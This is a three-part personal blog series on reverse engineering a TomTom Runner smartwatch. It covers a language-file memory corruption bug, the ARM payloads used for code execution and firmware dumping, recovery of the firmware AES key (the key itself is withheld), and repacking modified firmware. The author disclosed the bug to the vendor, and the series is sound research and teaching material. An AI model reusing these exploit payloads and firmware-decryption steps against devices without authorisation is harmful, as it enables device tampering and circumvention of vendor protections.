Luis Grangeia A personal blog

Hacking Smartwatches - the TomTom Runner, part 3 (final)

This is the third and final post of a series about embedded firmware hacking and reverse engineering of an IoT device, a TomTom Runner GPS Smartwatch. You should start by reading part one and part two of this series.

I intended originally for this series to contain only three posts, and in order to achieve that, this post is longer than anticipated. Here is a table of contents for easier navigation:

  1. Finding familiar code: Using the exploit to exfiltrate the first bits of data from the firmware.
  2. Disassembling dumped code: First experiences with objdump to disassemble the recovered firmware fragments.
  3. Improving the dumping procedure: As a result of the reversing of a subroutine, we were able to improve the dumping routine dramatically and extract the full bootloader.
  4. AES key brute-force approach: Our first naive approach to recover the AES key by scraping the bootloader binary.
  5. Runtime debugging with QEMU: A couple of cool tricks to make it easy to do runtime debugging of the dumped bootloader, including QEMU+ IDA configuration, and creating a runnable ELF binary to debug natively in ARM systems with GDB.
  6. Final hurdles and MD5 verifications: After recovering the AES key we must be able to unpack and pack the firmware file. Some hurdles had to be overcome, and MD5 checksums were found and computed.
  7. Putting it all together: Here we demonstrate the capability of unpacking and modified an encrypted firmware file and successfully uploading it back to the device.
  8. Conclusion and next steps: Wrap-up for this series, ideas for future firmware modifications, upcoming TomTom watches, and other wearable devices.

Also, I’ve set up a github repository where I’ll keep the scripts and other tools / notes used in this research. It already contains some scripts but I intend to document it further in the next few days.

In the first post of this series I introduced you to the TomTom Runner. In the second one I showed you how I found a memory corruption vulnerability and took advantage of it to gain control over the execution flow and run arbitrary code on the watch.

If we were talking about a common architecture, such as a Windows PC or an Android Smartphone, we could have stopped there: Usually when researching bugs on these architectures the researcher usually leaves the “weaponization” of the code as an exercise to the reader (or does it privately for a profit, but that is subject for another post). My point is that on these systems the work stops when the bug is found and reliably exploited.

However, as I painfully learned, when exploiting a foreign platform (non standard software and hardware) it turns out that having arbitrary code execution is only the beginning of a long process.

01. Finding familiar code

We ended our last post showing how we could upload (and then execute) arbitrary code to the watch. We proved that we could execute the code by forcing a crash and reading the values of the registers on the crash log after the CPU faulted and the watch rebooted.

Crashlog - SW ver 1.8.42
 R0 = 0x00000000
 R1 = 0x00001337
 R2 = 0x00000013
 R3 = 0x00000037
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x00000000 program counter
 PSR = 0x20000000
 BFAR = 0xe000ed38
 CFSR = 0x00020000
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4192 mV
 stack hi = 0x000004d4

Since we don’t have access to the firmware, we don’t know a lot of things, such as addresses of library functions, how to open/write files on the EEPROM, how to write to the LCD or how to communicate using USB. Had we known those things, the process to dump the device’s firmware would be relatively straightforward.

The only obvious way to learn about the contents of the firmware is to load memory positions to registers and induce a crash so that the resulting crashlog contains the interesting values. This can be done with the following assembler code:

1 ldr r4, =0x00400000
2 ldr r0, [r4], #0x04
3 ldr r1, [r4], #0x04
4 ldr r2, [r4], #0x04
5 ldr r3, [r4], #0x04
6 ldr r12,[r4], #0x04 
7 ldr lr, [r4], #0x04 
8 mov r4, #0x00
9 bx r4

(I now know that most of these ldr can be optimized into a single ldmia instruction, but bear with me. I knew zero about ARM assembler when I started this project.)

What this code does is load the contents of address 0x00400000 into the 32 bits of r0, then the next 32 bits into r1 and so on. We even use the lr register, which usually holds the return address, because we don’t need to return from this code. Then we induce a crash by attempting to bx into 0x00000000 which will always fail on a Cortex-M4 (as explained on the last post).

Using this code we can extract 24 bytes of RAM or ROM every time we reboot the device. The actual process works like this:

  • We craft our payload by assembling the instructions and inserting them into the correct region of the language file;
  • We then upload the file to the watch;
  • We unplug the watch from USB, wait 2-3 seconds for it to boot;
  • We then proceed to the language menu and try to select a specific language. The device will crash and reboot;
  • We plug the device back to the PC and read the crash log file containing the chosen bytes of RAM (or ROM).

This process must be repeated for ever 24 bytes we wish to extract from the device. I automated all the possible bits into a Python script, but the process involves plugging and unplugging the device’s USB connection to the PC and manually interacting with it.

After some practice I could do a “cycle” of this process in around 20 to 30 seconds. Since we know the firmware is around 400kb, extracting the whole of it would take around six days of constant device reboots and button mashing, without sleeping or eating. I don’t know about you but that doesn’t seem like a particularly fun use of my time :)

So we need to be very specific and find interesting bits of memory to dump and then analyze. I could only think of a good place to start: The code that was generating the crash log file. It checked all the boxes:

  • It should be easy to find: Since the code must be called when there’s a hard fault of the CPU, it must be indexed in a table at a specific address;
  • It should be simple and self contained: This code only needs to gather some information, and write it to a file on the EEPROM;
  • It does what we want to do: This code should be able to write to a file on the EEPROM. We want to do this because it would enable us to dump the entire contents of firmware to the EEPROM.

How do we find the starting address for the hard fault routine? Looking at the Atmel datasheet for the MCU gives us what we need: The address for the routine is at the Vector Table, as shown here:

Vector Table

The Vector Table itself is mapped at address 0x00000000 on boot but it may be relocated. To find the current address of the Vector Table we can use the Vector Table Offset Register (SCB_VTOR), which is memory mapped at 0xE000ED08 as shown here:

Vector Table Offset Register

So this code should get us the starting address for the fault handler:

 1 .syntax unified
 2 .thumb       
 3 
 4 /* Load VTOR address */
 5 ldr r2, =0xE000ED08
 6 ldr r3, [r2]
 7 
 8 /* add offset to hardfault address */
 9 mov r1, #0x0c
10 add r2, r3, r1
11 
12 /* load hardfault address */
13 ldr r3, [r2]
14 
15 /* halt and catch fire */
16 mov r4, #0x00
17 bx r4
18 
19 /* RESULT: hardfault address is 0x0040bfa1 */

When executing this code on the device the value we get for r3 in the crash log is 0x0040bfa1, so we can assume that the hardfault handler code starts at 0x0040bfa0 (remember that the LSB is only for specifying Thumb mode).

Using some Python magic (script dump_script.py) we dump some bytes from this address and we get the main routine of the hard fault handler code.

02. Disassembling dumped code

Before I show you the recovered code we must arrange it in binary form in a way that it can be easily disassembled and analyzed. The easiest thing to do is to create a zero-filled file of 1 megabyte (our firmware is smaller than that). Then using Python we can start populating this file at the correct offsets, assuming that the base of the ROM is at address 0x00400000.

The script dump_script.py automates the whole process of dumping region “x” from the device and writing to this file (DUMP.bin).

We can disassemble the recovered code using objdump or IDA. Remember that, since we can only dump 24 bytes at a time, we’re going to be looking at incomplete code.

We can disassemble the code with objdump like so:

arm-none-eabi-objdump -D -s -b binary --show-raw-insn --prefix-addresses -EL --adjust-vma=0x00400000 -marm -M force-thumb -C DUMP.bin

Here is the beginning of our hard fault handler code:

1 0x0040bfa0 f01e 0f04    tst.w   lr, #4
2 0x0040bfa4 bf0c         ite     eq
3 0x0040bfa6 f3ef 8008    mrseq   r0, MSP
4 0x0040bfaa f3ef 8009    mrsne   r0, PSP
5 0x0040bfae f004 bedb    b.w 0x00410d68

At this point I did some Google searches based on the format of the crash log file and found this page, containing an example function authored by Joseph Yiu for a Cortex-M3/M4 fault handler function. Note the similarities of the the printf() outputs with the crash log file (shown at the beginning of this post), and especially the assembler function preamble, which is - byte for byte - the same code we extracted from the device.

 1 .syntax unified
 2 .cpu cortex-m3
 3 .thumb
 4  
 5 .global HardFault_Handler
 6 .extern hard_fault_handler_c
 7  
 8 HardFault_Handler:
 9   TST LR, #4
10   ITE EQ
11   MRSEQ R0, MSP
12   MRSNE R0, PSP
13   B hard_fault_handler_c

Code taken directly from the blog post from 2011. Note the similarities with the dumped code above

It seems we’re at the right place :)

03. Improving the dumping procedure

What I did next was to dump the main hard fault subroutine and replicate it in the exploit payload. The objective was to experiment changing the code in order to dump more bytes at a time. The hard fault routine is similar to the skeleton code by Joseph Yiu, but not the same:

  • Obtains some more information regarding firmware version and battery levels;
  • Opens a file on the EEPROM and writes to it (as opposed to the original code which writes to stdout);
  • Reboots the device.

I had to do some static analysis and dump some parts of the code, but the main way of finding out what which subroutine did was to upload the modified code and run it directly on the device. Note that we don’t need to dump all the code, just the main routine. We call the other routines directly in ROM space. Remember that our goal here is to increase the amount of bytes that can be exfiltrated from the device each time. After some evenings I was somewhat successful. Here is the code I have for show:

 1 .syntax unified
 2 .thumb
 3 
 4 push    {r0-r12, lr}    /* save registers and return address */
 5 sub.w   sp, sp, #616    /* resize stack */
 6 
 7 bl      fillup          /* fill stack with mem dump */
 8 
 9 mov.w   r1, #512        /* arguments for write() */
10 add     r0, sp, #100
11 ldr     r7, =0x00410e39 /* call write() */
12 blx     r7
13 
14 add.w   sp, sp, #616    /* shrink back stack */
15 pop     {r0-r12, lr}    
16 bx      lr              /* return from exploit payload (END) */
17 
18 /**** 'fillup' function populates the stack with memory *****/ 
19 fillup:
20 add     r4, sp, #100
21 
22 /* first 8 bytes **must** contain the string "Crashlog" */
23 ldr     r7, =0x73617243
24 str     r7, [r4], #4
25 ldr     r7, =0x676f6c68
26 str     r7, [r4], #4
27 
28 ldr     r7, =0x00408706 /* Starting address for the dump */
29 add     r4, sp, #108
30 mov     r3, #94
31 lp1:
32     ldr     r8, [r7], #4
33     str     r8, [r4], #4
34     sub     r3, #1
35     cbz     r3, end
36     b       lp1
37 end:
38 bx lr                   /* return from 'fillup' function */

After a lot of trial and error I was able to identify a function at 0x00410e38 that I dubbed “write()”. This function takes two arguments: A pointer to a buffer and a size (lines 9-10). It then writes the buffer to the crash log file. The funny thing: It does not write more than 376 bytes and the first 8 must be the string “Crashlog” (see lines 23-26). Don’t ask me how I figured this out, as it was late in the evening (or early morning depending on how you look at it).

So I basically assembled this, loaded it into the watch and had a way to dump 376 bytes per device reboot, which was a vast improvement over the previous 24 byte limit.

With this script it was possible to dump the entire firmware in a reasonable amount of time. I started on address 0x00400000 and discovered that from this address to 0x00408000 we can find the device’s bootloader. In a matter of a few minutes (or around 90 device reboots) I was able to dump it entirely.

Since the bootloader is responsible for the flashing of the firmware file it should contain the AES key to decrypt it.

To recap, this is what we know so far regarding the firmware update procedure:

Firmware Upgrade

  1. Firmware is uploaded via USB to the EEPROM chip;
  2. Upon reboot, the bootloader checks if there’s a new firmware file on the EEPROM, and verifies if it’s valid;
  3. If valid, the bootloader decrypts and flashes the firmware on the Atmel chip (internal flash)

We know all this by looking at previous hints but also by analyzing the bootloader we dumped. I will focus next on analyzing the bootloader, both statically (looking at the code) and dynamically (emulating + debugging).

But first, a parentheses on trying a quick way to find the AES key to the encrypted firmware file.

04. AES key brute-force approach

Having dumped the entire bootloader we can conclude that:

  • The bootloader must contain all the information necessary to decrypt the main firmware file, namely the AES decryption key;
  • It is very likely the firmware is encrypted in AES ECB mode;
  • We already have pieces of the main firmware’s plaintext;
  • An AES key is a random byte string of length 128, 192 or 256 bits.

Armed with these pieces of information, my busticati friend pmsac (at toxyn.org) contributed to this mission with a small Python script that would sweep the bootloader and try and decrypt the main firmware file with every consecutive 16 byte string contained in the dumped bootloader (using a byte-by-byte sliding window over the entire bootloader file, not really caring for duplicates). There was also some care to make sure we were working on the right endianess. The resulting outputs were then passed through “ent” and the calculated entropy value was used to decide if a certain “plain text” was the desired output.

Unfortunately this did not produce a valid result. All of the resulting “plain texts” had no recognizable strings and still very high entropy, characteristic of encrypted/random byte sequences.

We must make sense of the bootloader and try to understand why the key was not immediately available.

05. Static analysis with IDA

To load the dumped bootloader binary blob into IDA it’s just necessary to select ARM little endian architecture and base the file at 0x00400000, like the following picture shows:

bootloader loading

The bootloader is not huge by any means (32kb), but since we already know what we’re looking for, it doesn’t make sense to lose time. Lets go find data structures which AES uses, such as S-Boxes:

AES S-Box

There’s the S-Box :) Following code references to this array we get to the AES functions, and traversing back from those we finally arrive to a main routine which looks like the main firmware upgrade routine, at 0x004058d4. Here’s IDA’s graph view of it, just because it looks nice:

Firmware Upgrade Graph

This looks like a nightmare to analyze, but remember: at this stage we’re just looking for something very simple: A reference to the AES key.

By now it’s important to talk about the basics of AES: AES uses three possible key sizes: 128, 192 or 256 bits. Before doing a single round of encryption, AES must do a computation called AES key expansion which basically takes the master key and creates additional separate keys derived from the original, to use in each AES round.

Using static analysis I could recognize the AES key expansion function at 0x00404618. Here it is being called early in the firmware upgrade routine:

AES key expansion
(I named the routines as I was recognizing them in IDA)

The routine takes two arguments, passed in r0 and r1 (ARM calling convention is helpful here: Arguments are almost always passed via registers), the arguments are the address for the original key (r0) and the size of the key (r1). We learn from this that:

  • Key size is 128 bits (0x10);
  • The key is stored in RAM at 0x2000001c.

There must be some code somewhere that’s loading the key in RAM before this code runs. We have to find it.

This was around the time that my limited experience doing static analysis kicked in. I simply could not guess anymore and had to see the code running.

Let’s talk a bit about getting this code into a debugger and doing some runtime analysis.

05. Runtime debugging with QEMU

Since we already have the code loaded into IDA Pro, it is a simple matter of using an emulator such as QEMU to emulate and debug the code.

This post was very helpful on the setup. There were some issues with QEMU, namely there is no QEMU ARM “machine” that emulates RAM at the 0x20000000 range. This was a problem that I had to overcome by creating breakpoints and manually “remapping” the RAM range to a different region at 0x02000000.

Later I was told about another (better) way to run QEMU to help debug this program, which is to run it in user mode. Basically I found you can run QEMU in three different ways:

  • In kernel mode where you run a single kernel process that talks to the underlying virtual machine hardware directly;
  • In VM mode where you set up a virtual OS environment, usually a Linux kernel and initrd image and filesystem, and then start the program to be debugged inside the VM environment;
  • In User mode where you run QEMU in transparent fashion. For instance if you’re in a Linux x86 system and have a Linux ARM ELF binary you just need to run ./qemu and it runs directly.

I found the third option very interesting. All that was needed was to create an ELF executable from the binary blob I had from the bootloader.

This can be done using the GNU linker. Documentation is pretty bad though, so I’ll leave here an example:

Main linker script (linker.ld):

ENTRY(_bl_start)

PHDRS
{
        text PT_LOAD AT (0x00400000) FLAGS (0x7) ;
        data PT_LOAD AT (0x20000000) FLAGS (0x7) ;
}

SECTIONS
{
        .text 0x00400000 : { *(.bootloader) } :text
        .data 0x20000000 : { *(.sram) } :data
        .note.gnu.build-id 0x0 (NOLOAD) : { *(.note.gnu.build-id) } :NONE
}

bootloader.s:

.section .bootloader, "ax"

.global _bl_start
.incbin "BOOTLOADER.bin"
.set _bl_start, 0x004000e5

sram.s (the sram_128k.bin file is merely a null filled file. This is necessary to make the ELF binary pre-allocate the RAM segment):

.section .sram, "awx"
.incbin "sram_128k.bin"

With these three files the ELF binary can be compiled like so:

gcc -static -c sram.s
gcc -static -c bootloader.s
gcc -static -nostdlib -T ./linker.ld -o bootloader.elf bootloader.o sram.o

The cool thing about this is that you can run this binary natively on a Raspberry Pi 2 (but not on the original rPi, because its CPU does not support the udiv instruction for integer division, which the Cortex-M4 uses).

The program will still segfault because it is attempting to read from memory mapped registers outside the RAM region. You can map these register addresses in a similar way to the way we allocated the RAM region, or you can simply step over the offending functions using GDB.

Tracing with GDB in IDA is very easy and you can see the RAM as it gets populated. Without bothering you with the details, here’s what I found out that was happening:

  • Early in the bootloader execution the key is loaded from ROM into RAM. It’s actually at address 0x00406f0c
  • The AES key expansion routine at 0x00404618 is called later and expands the key. However before the expansion is done, a single byte of the key is changed: The first byte of the key is set to 0x04!

We have the firmware key! I won’t post it here because of reasons (I have not consulted my lawyer yet). If you are worthy, with all this help you’ll get it pretty quickly :)

06. Final hurdles and MD5 verifications

Using AES ECB with the extracted key provided us with easily recognizable strings and ARM instructions. There was however a small hurdle, as the TomTom engineers did an additional obfuscation step: The first byte of each plaintext 16-byte block was off. This was easily spotted by looking at offsets containing ASCII strings.

mangled dump

Again, my friend pmsac managed to break this obfuscation before I had the chance to even try. There is a xor operation done on the first byte of each block with a rolling value ( incremented by 4 on each iteration and wrapping around at 0x80). Here’s the code to “demangle” the first byte of every plaintext block:

 1 def xormask_blob(data):
 2    i = 0
 3    output = ''
 4    extra = 0
 5    while i < len(data):
 6       output = output + chr(ord(data[i])^extra) + data[i+1:i+bsize]
 7       extra += 0x4
 8       extra &= 0x7f
 9       i += bsize   # bsize is 16 bytes
10    return output

The next step was to upload a modified firmware file into the watch. Using static analysis of the firmware upgrade routines I already knew there were two different MD5 verifications. But static analysis has its limits and I couldn’t tell exactly where and how the MD5 sums were verified.

Again my good and talented friends helped. João Poupino built a script that brute-forced a lot of different MD5 calculations, with both the plaintext and the ciphertext. Using this script we got to the following conclusions:

  • The first 16 bytes’ block of the firmware file is a “poor man’s HMAC”: it’s the result of md5sum(ciphertext + encryption_key);
  • In the plaintext there is a second md5sum() of the plaintext at the end of the code to be flashed. I believe it’s used by the bootloader to verify that the code has been correctly flashed.

07. Putting it all together

I did a small script that decrypts and encrypts a firmware file given its key. Most of the tools and techniques I used in this project are (or will be) published at my github here.

I did a small proof of concept by modifying a string inside the firmware file. Since almost every string you see when normally operating the watch is localized from an external language file (which we’ve already seen are easy to change without touching the main firmware), I had to look for something different: the Test Menu uses hardcoded strings, and I modified the one that originally said “Waiting for cmd”. The new string is much better, as you can see in the pictures.

hex editing custom firmware

hacked test menu

This is an innocuous modification but it proves it is now possible to write custom firmware for the TomTom Runner.

08. Conclusion and next steps

After doing all this and opening up the opportunity of creating custom firmware for this device, I really hope I manage to inspire someone to create something cool for this watch. I have some ideas already:

  • Port Linux! There’s not enough flash space or RAM to run ucLinux, let alone a full fledged Linux kernel.
  • Modify the existing firmware: Turning a TomTom Runner into a TomTom Multisport doesn’t seem particularly hard, as it seems it only verifies some values on the Bootloader region. The firmware is identical. Patching the firmware to always show the Multisport functionality doesn’t seem at all that complicated, but I haven’t spent time on that.
  • Create a skeleton source tree from scratch: I’m still not sure, but the firmware seems based on FreeRTOS, an open-source OS. It should be feasible to reverse the hardware drivers (LCD, EEPROM) and recreate a basic firmware to serve as placeholder for an open-source alternative. This should allow for other fun uses for the hardware;
    • A simple smartwatch with smart notifications;
    • A wearable Ubertooth One! (this one would be my favourite, by far).

I will end this by giving a big thank you to everyone that helped me on this project, especially pmsac and João, who might have saved me from permanent insanity. I had a blast, learned quite a lot and hope to have contributed to the research community with these posts.

Regarding TomTom, I made sure I contacted them beforehand, letting them know about this issue. They acknowledged it and have been very polite, and have already implemented some changes to the latest versions of the Firmware. I hope further long term changes get implemented especially on their next line of products, to help mitigate this issue.

Also, I recently bought a new TomTom Spark and I may return to this later to see if the new models are that much different. We’ll see. It should be interesting to see if other smartwatches can be hacked this way. Interesting devices that I encourage people to look at: the Garmin Forerunner line, Polar sports watches and also the Pebble.

If you’re still reading, thank you! Tweet me at @lgrangeia and give me feedback and ideas for new projects.

Hacking Smartwatches - the TomTom Runner, part 2

This is the second of a series of posts about embedded firmware hacking and reverse engineering of an IoT device, a TomTom Runner GPS Smartwatch. You should start by reading part one of this series.

In the previous post I introduced the device and gave a detailed overview of its inner workings. Here’s what we know so far:

  • It’s an ARM device running an ATmel MCU with a Cortex-M4 processor;
  • Its firmware is distributed encrypted, likely with AES encryption in ECB mode;
  • It has a 4 Megabyte EEPROM which contains a filesystem with interesting stuff, including:
    • Exercise files (created when you go out for a run);
    • Language files (used to provide the translated menus on the user interface);
    • Configuration files.
  • Most of the USB protocol has been reversed, and a lot of it involves reading and writing files to the EEPROM. We can use ttwatch for these operations.

01. Finding a Vulnerability

The first thing I did was to look at every file on the watch’s EEPROM. Apart from the files above, there were also log files. Here’s an example of one:

log file

This shows that the Bluetooth chip (BLE) has its own firmware and it’s being flashed after its MD5 sum is validated.

I was interested in files that would be parsed by the device. This was because I could change them easily and wanted to try to exploit vulnerabilities in its parsing engine. Two types of files fit that criteria: exercise and language files.

Exercise files have a binary format (ttbin) which has been documented already and there are some tools to convert them to other formats (used by sites such as Runkeeper, Strava etc.) - e.g. ttwatch. I considered those and then put them aside for two reasons:

  • The watch doesn’t parse these files, it only produces them. There’s a menu that shows you the summary of your recent runs, but it’s read from a different file that contains the summary of all runs; the device never reopens the ttbin files for reading.
  • The binary format doesn’t appear to contain variable length fields or strings. This is where parsers usually have bugs. If the format is simple, the parser is simple and bugs are rare.

Language files are more interesting. Let’s look at the content of one:

language file

This has a very simple structure:

  • The first four bytes are a 32 bit little-endian integer representing the size of the file minus the first eight bytes – lets call it sbuf_size;
  • The next four bytes are a 32 bit little-endian integer representing the number of ASCII strings included in the file – num_strings;
  • The rest of the file contains null-terminated strings, mostly ASCII. Some characters are non-printable, presumably for some custom bitmaps (some menu entries have icons, like an airplane in the “airplane mode” option).

There are lots of situations that could confuse a parser for this file, so I did my list of nasty things to tinker with:

  1. Format strings: I substituted every single string with “%x”;
  2. A zero sbuf_size with a non zero num_strings;
  3. A single large oversized string;
  4. sbuf_size larger than the true file size;
  5. num_strings larger than the true number of null-terminated strings;
  6. No nulls in the strings.

I think you get the picture. The structure is simple enough that you don’t need an automated fuzzer to catch most situations where the parser would fail.

It was a simple matter of editing the file with an hex editor on the PC, and then uploading it to the watch using the ttwatch file transfer option:

$ cat 00810003.bin | ttwatch -w 0x00810003

Each file corresponds to a different translation, in this case I changed the German file. Then I would disconnect the watch from USB and change the device’s language to German and observed the result. For instance, large strings would not crash the watch. Format strings were presented literally, no format string conversion.

The first interesting result was with a zero sbuf_size and a non-zero num_strings. Here’s a video of it:

Note that the strings are changing during the watch operation. Basically the interface is loading strings (or pointers to said strings) from some RAM region which is written to during the device’s operation.

This was interesting. Even more interesting was the next result: we created a large file with an sbuf_size larger than 6000 bytes. In this case we used 6001 bytes. The file size was coincident with sbuf_size. Here’s the result:

The device appears to reboot when you attempt to change UI language. If I remember correctly, other edge cases would also cause a reboot.

But this one was different though, as afterwards there was a new file present on the EEPROM (0x00013000). Here it is:

$ ttwatch -r 0x00013000
Crashlog - SW ver 1.8.42
 R0 = 0x010f0040
 R1 = 0x00000000
 R2 = 0x00000002
 R3 = 0x00000f95
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x2001b26c program counter
 PSR = 0x41000000
 BFAR = 0x010f0040
 CFSR = 0x00008200
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4160 mV
 stack hi = 0x000004d4

Oh, hi there, crash log!

There’s quite a lot to learn from this file. We get the values of several registers, including the program counter, R0-R3, R12, some state registers (PSR, BFAR, etc.), as well as the battery level and the size of the stack. By repeating the same procedure after a reboot we get the same values for the registers, which means the watch does not implement any kind of memory layout randomization.

What followed was a lot of reading of datasheets and ARM documentation. The most important thing I quicky learned is that the execution flow was changed from the flash ROM to the RAM region. This can be seen by the value of the PC (program counter). Its value is in a region of memory reserved for RAM. Note the following image from the Atmel datasheet:

memory mappings

For some reason, execution was jumping from the flash ROM region (0x00400000 - 00x00800000) to the SRAM, which starts at address 0x20000000, near where our language file is loaded. If only we could finely control the position of our language file or “nudge” the program counter in the right direction, we could jump to a memory region under our control.

After some fiddling I noticed that there were two different types of crashes: the first one where I selected the corrupted language, and the second one where I merely scrolled past the language on the menu. The latter would also trigger a reboot. It seemed that the language file was parsed / loaded into RAM regardless of wether you selected it or not.

This gave me an idea: I would try to change the content of other language files to see if that would somehow influence the register values.

I changed the next language file in the list of languages to be composed of all B’s (ASCII value 0x42), with the value of sbuf_size unchanged and num_strings set to zero. The previous language file still had a sbuf_size size of 6001. Then I rebooted the watch, went to the language menu and scrolled through the languages. This was the resulting crash:

Crashlog - SW ver 1.8.42
 R0 = 0x2001b088
 R1 = 0x42424242
 R2 = 0x00000002
 R3 = 0x00000f95
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x42424242 program counter
 PSR = 0x60000000
 BFAR = 0xe000ed38
 CFSR = 0x00000001
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4190 mV
 stack hi = 0x000004d4

Look at that, we can control what goes into the program counter! For some reason, the execution flow is jumping to an address we control. The address to which is jumped to is actually the 4th double-word (32 bit value) on the second file.

02. Code Execution

Ok, we now have a way to divert execution to anywhere on the device’s memory, what can we do? On a normal operating system we usually have lots of known locations in memory we can jump to: system calls, standard library calls, etc. Here we don’t have that luxury.

The first thing to do is to verify the execution of a simple payload. Payload construction can be done in assembler. Here’s my first try:

.syntax unified
.thumb

mov r2, #0x13
mov r3, #0x37

add r1, r3, r2, lsl #8

mov r0, #0
bx r0

We must specify the Thumb instruction set because the Cortex-M4 only works in Thumb mode. This simple program loads two immediate values in r2 and r3, and then performs an add operation with a left shift and stores the result in r1.

The last two lines make a jump to address 0x00000000. This causes a crash everytime, and the reason for it is that ARM processors decide between ARM and Thumb instruction sets based on the least significant bit of the instruction address on a bx jump. The LSB bit is at zero, so we’re switching to the ARM instruction set. As explained above, the ARM Cortex-M4 only supports Thumb, so it faults.

We can assemble this on a non-ARM Linux system with a cross compiler toolkit like so (you wouldn’t need this on an ARM machine, such as a Raspberry Pi):

$ arm-none-eabi-as -mcpu=cortex-m4 -o first.o first.s

Sure enough, here’s the produced code, disassembled using objdump:

$ arm-linux-gnueabi-objdump -d first.o

first.o:     file format elf32-littlearm

Disassembly of section .text:
00000000 <.text>:
   0:	f04f 0213 	mov.w	r2, #19
   4:	f04f 0337 	mov.w	r3, #55	; 0x37
   8:	eb03 2102 	add.w	r1, r3, r2, lsl #8
   c:	f04f 0000 	mov.w	r0, #0
  10:	4700      	bx	r0

Next thing to do is to put this payload inside the watch. We load this into the German language file and then point to it using the pointer that’s being used for the jump (4th double-word from the second file).

The following image shows everything set up on the second file (0x00810003):

memory mappings

The fourth double-word is an absolute pointer to our payload. We then load the file into the watch and do the usual procedure of scrolling through the languages.

(I skipped some steps on finding the correct address for the jump. Basically it boiled down to trial and error and using a NOP sled to find the correct address, nothing fancy. Remember, this is totally deterministic, no randomness whatsoever.)

After the expected crash, here’s the resulting crash log (note the value of R1, R2 and R3):

Crashlog - SW ver 1.8.42
 R0 = 0x00000000
 R1 = 0x00001337
 R2 = 0x00000013
 R3 = 0x00000037
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x00000000 program counter
 PSR = 0x20000000
 BFAR = 0xe000ed38
 CFSR = 0x00020000
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4192 mV
 stack hi = 0x000004d4

Et voilá! We now have arbitrary code execution on a closed firmware wrist worn IoT device. Yes, we are l33t.

How cool is that? :)

03. To be continued…

Though we’ve gotten far, this is still not the end. We can now execute arbitrary code inside our watch, but we’re still pretty much in the dark. Remember, we want to be able to gain access to the firmware inside the watch, be it by obtaining the encryption key or dumping it from the watch.

How do we do that? How would you do that? I’m ending this post with a challenge: tell me how would you approach this problem. Let me hear your strategies of obtaining more information about the current execution environment and how would you go about to exfiltrate/obtain/reach the firmware’s encryption key.

Please tweet to me at @lgrangeia with your ideas. Ask me questions and maybe I’ll provide hints. To my friends who already know how I did it, no spoilers please :)

I’ll show you how it was done on the third (and final) post in this series, due to come out (hopefully) next week. Stay tuned.

Hacking Smartwatches - the TomTom Runner, part 1

tl;dr: this is a series of posts about embedded firmware hacking and reverse engineering of a IoT device, a TomTom Runner GPS Smartwatch. Slidedecks of this work will be available here when I complete this series.

hacked by kossak

While specialization is key in most areas, I feel that in the field of information security too much specialization leads to tunnel vision and a lack of perspective. This blog is my attempt to familiarize myself in areas where I’m usually not comfortable with.

This series of posts will focus on a subject that I really sucked at until the last couple of months: reverse engineering of embedded systems.

01. Introduction

I will show you how I hacked a TomTom Runner GPS Smartwatch, by:

  • Finding a memory corruption vulnerability exploitable via USB and possibly bluetooth (if paired);
  • Taking advantage of said vulnerability to gain access to its encrypted firmware;
  • Doing all this without ever laying a screwdriver near the device (no physical tampering).

After reading about the epic hacking of the Chrysler Jeep by Charlie Miller and Chris Valasek, and getting to watch their talk at Defcon this year (seriously, go watch it if you haven’t already), I felt really jealous because I wanted to be able to do that, so I got to work.

02. Motivations

Apart from the “hacker tingles” you get from hacking devices that exist in the real world, as opposed to hacking an abstract computer software / web application, there were some other reasons that got me into IoT hacking and motivated me to start reverse engineering such a device:

  • Simpler architectures: Usually embedded devices have much less complex hardware and software than a general purpose computer or a smartphone/tablet with a complex OS;
  • Fewer attack mitigations: These things usually lack memory protections such as ASLR, DEP, stack canaries, etc.;
  • ARM Architecture: I had some previous experience in x86/x64 reversing, but having to get back to it, I feel that learning ARM is probably more important now than Intel architectures, well because Android, iOS, smartphones & tablets;
  • Charlie Miller and Chris Valasek made it look easy :)

Then there’s the obvious buzzword of the year, The Internet of Things. Buzz aside, I feel that we’re really getting to the point where every electronic device is generating data and sharing it to the world.

We’re converging to a hyper-connected world, in the likes of a movie that really made an impression on me while growing up: Ghost in The Shell. The characters in the movie are so much surrounded (and implanted) with technology that they don’t even need to move their lips to talk – their thoughts are wirelessly transmitted to each other. We’re getting closer to that fascinating (and scary) future.

03. Research

So I looked around my house for devices I could start hacking. Found these:

Volkswagen RC510:

VW RCD510
This is my car’s head unit, as seen in some VW cars. I started looking at this before VW’s Diesel scandal, but while this looks like a cool challenge, there are some logistical concerns: I use the car everyday and can’t afford to “crash” it. Car hacking is a booming field though, might be something I’ll return to later.

A-Rival Spoq SQ-100

Spoq SQ-100
This is a GPS sportswatch more suited for trail running. It is actually easier to hack than the TomTom, because the firmware is not encrypted. But the watch didn’t interest me much because it’s based on an AVR architecture (as opposed to ARM), doesn’t have Bluetooth, and isn’t very popular. Might come back to it later, though.

The TomTom Runner

TomTom Runner
The Tomtom runner is a cooler watch. If you’re looking for a good and cheap GPS running watch this is it. It has Bluetooth low-energy, an ARM processor, and TomTom is really getting into the market that’s mostly dominated by Garmin now, so let’s keep investigating.

The first thing I did was to download the firmware for all these devices. Firmware for these devices can usually be found on the manufacturer’s web site, user forums etc.

Analyzing the firmware files for these devices was done using binwalk. The results were discouraging: Out of the three devices, the main firmware was encrypted using a 16 byte block cipher (probably AES) in two of them. It appears that most of the firmware these days is distributed encrypted.

04. Attack Surface

I chose the TomTom, so the next thing to do was to look at it from a hacker’s perspective. I’m good at breaking things but not so good at putting them back together, and since I use the watch regularly for its intended purpose, I made a promise to myself not to try to open it and attempt any sort of hardware hacking via JTAG/Debug pins. Also there would likely be at least some protections and it’s a steep learning curve with some penalty for error.

So what are our options from an external perspective? I figured these were the attack vectors:

  • User Interface: You can use the four-way D-Pad to try and attack the device. I tried, and failed.
